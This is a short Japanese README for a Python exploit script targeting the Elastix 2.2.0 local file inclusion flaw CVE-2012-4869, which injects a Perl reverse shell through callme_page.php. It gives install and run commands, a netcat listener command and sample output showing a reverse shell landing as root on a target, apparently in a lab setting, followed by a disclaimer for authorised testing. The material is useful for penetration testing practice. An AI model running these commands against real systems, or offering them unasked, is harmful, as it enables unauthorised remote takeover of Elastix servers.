
Python製のエクスプロイトスクリプト。Elastix 2.2.0のLFI脆弱性(CVE-2012-4869)を悪用し、Perlリバースシェルペイロードの注入によるリモートコード実行を可能にします。
このスクリプトは Elastix 2.2.0 のローカルファイルインクルード (LFI) 脆弱性を悪用し、callme_page.php エンドポイントを介してコマンドを注入することでリモートコード実行 (RCE) を可能にします。このエクスプロイトは CVE-2012-4869 に基づいています。
requests モジュール次のコマンドで依存関係をインストールします:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
エクスプロイトを実行する前に、お使いのマシンで Netcat リスナー を開始してください:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
このエクスプロイトは教育および許可されたセキュリティテスト目的のみに使用されます。無断使用は違法です。作者はこのツールの誤用について責任を負いません。